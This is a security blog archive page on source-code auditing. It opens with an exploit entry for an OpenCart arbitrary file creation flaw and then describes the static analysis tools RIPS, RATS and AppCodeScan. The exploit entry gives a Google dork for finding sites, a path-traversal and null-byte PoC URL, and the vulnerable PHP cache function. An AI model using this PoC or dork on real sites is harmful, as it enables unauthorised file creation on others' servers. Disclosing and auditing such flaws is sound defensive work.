Archive

Archive for the ‘Audit Source Code’ Category

OpenCart Arbitrary File Creation (All versions)


# Exploit Title: OpenCart Arbitrary File Creation (All versions)
# Google Dork: “Powered By OpenCart”
# Date: 2011-09-06
# Author: dhson (danghaison(at)gmail.com)
# Software Link: http://www.opencart.com/index.php?route=download/download
# Version: All version


PoC

http://www.site.com/index.php?country_id=/../../../demo.php%00&route=account/register/zone&zone_id=1

—————
Vulnerable code
—————

public function set($key, $value) {
$this->delete($key);

$file = DIR_CACHE . ‘cache.’ . $key . ‘.’ . (time() + $this->expire);

$handle = fopen($file, ‘w’);

fwrite($handle, serialize($value));

fclose($handle);
}

Advertisements

RIPS


RIPS is a static source code analyser for vulnerabilities in PHP webapplications.

Download: http://sourceforge.net/projects/rips-scanner/
Features:

  • detect XSS, SQLi, File disclosure, LFI/RFI, RCE vulnerabilities and more
  • 5 verbosity levels for debugging your scan results
  • mark vulnerable lines in source code viewer
  • highlight variables in the code viewer
  • user-defined function code by mouse-over on detected call
  • active jumping between function declaration and calls
  • list of all user-defined functions (defines and calls), program entry points (user input) and scanned files (with includes) connected to the source code viewer
  • create CURL exploits for detected vulnerabilties with few clicks
  • visualization, description, example, PoC, patch and securing function list for every vulnerability
  • 7 different syntax highlighting colour schemata
  • display scan result in form of a top-down flow or bottom-up trace
  • only minimal requirement is a local webserver with PHP and a browser (tested with Firefox)
  • regex search function
Categories: Audit Source Code

RATS – Rough Auditing Tool for Security


RATS – Rough Auditing Tool for Security – is an open source tool developed and maintained by Secure Software security engineers. Secure Software was acquired by Fortify Software, Inc. RATS is a tool for scanning C, C++, Perl, PHP and Python source code and flagging common security related programming errors such as buffer overflows and TOCTOU (Time Of Check, Time Of Use) race conditions.

RATS scanning tool provides a security analyst with a list of potential trouble spots on which to focus, along with describing the problem, and potentially suggest remedies. It also provides a relative assessment of the potential severity of each problem, to better help an auditor prioritize. This tool also performs some basic analysis to try to rule out conditions that are obviously not problems.

As its name implies, the tool performs only a rough analysis of source code. It will not find every error and will also find things that are not errors. Manual inspection of your code is still necessary, but greatly aided with this tool.

Download

Win32: https://www.fortify.com/downloads2/public/rats-2.3-win32.zip

Source tarball: https://www.fortify.com/downloads2/public/rats-2.3.tar.gz

usage: rats [options] [file]…

Options explained:

-d <filename>, –db <filename>, –database <filename>

Specifies a vulnerability database to be loaded.  You may

have multiple -d options and each database specified will

be loaded.

-h, –help      Displays a brief usage summary

-i, –input     Causes a list of function calls that were used which

accept external input to be produced at the end of the

vulnerability report.

-l <lang>, –language <lang>

Force the specified language to be used regardless of

filename extension. Currently valid language names are

“c”, “perl”, “php”, “python” and “ruby”.

-r, –references

Causes references to vulnerable function calls that are not

being used as calls themselves to be reported.

-w <level>, –warning<level>

Sets the warning level.  Valid levels are 1, 2 or 3.

Warning level 1 includes only default and high severity

Level 2 includes medium severity. Level 2 is the default

warning level 3 includes low severity vulnerabilities.

-x              Causes the default vulnerability databases (which are in

the installation data directory, /usr/local/lib by default)

to not be loaded.

-R, –no-recursion

Disable recursion into subdirectories.

–xml       Cause output to be in XML

–html      Cause output to be in HTML

–follow-symlinks

Evaluate and follow symlinks.

Categories: Audit Source Code

AppCodeScan


This tool is designed to help in performing whitebox testing. During whitebox testing one needs to scan complete application code for various different vulnerabilities like XSS, SQL injection, Poor validations etc. It is possible to discover these vulnerable points using this tool and one can follow code walking across the code base to trace this vulnerability.This tool works on following two areas:

Code Scanning – One needs to feed target code folder, rules pattern in regex (sample is provided for ASP) and list of file extension to scan. The tool will take this information and run against the target folder with depth of three (3) and scan each line for matching pattern. If pattern is found then it will report that line in the tool.
Code Walker – This little utility would help in walking across the code base and find variable or function. This will help to trace variables and their entire path in the large code base. This utility would help in negating false positives from the identified pattern.

Link download: http://blueinfy.com/AppCodeScan.zip

Categories: Audit Source Code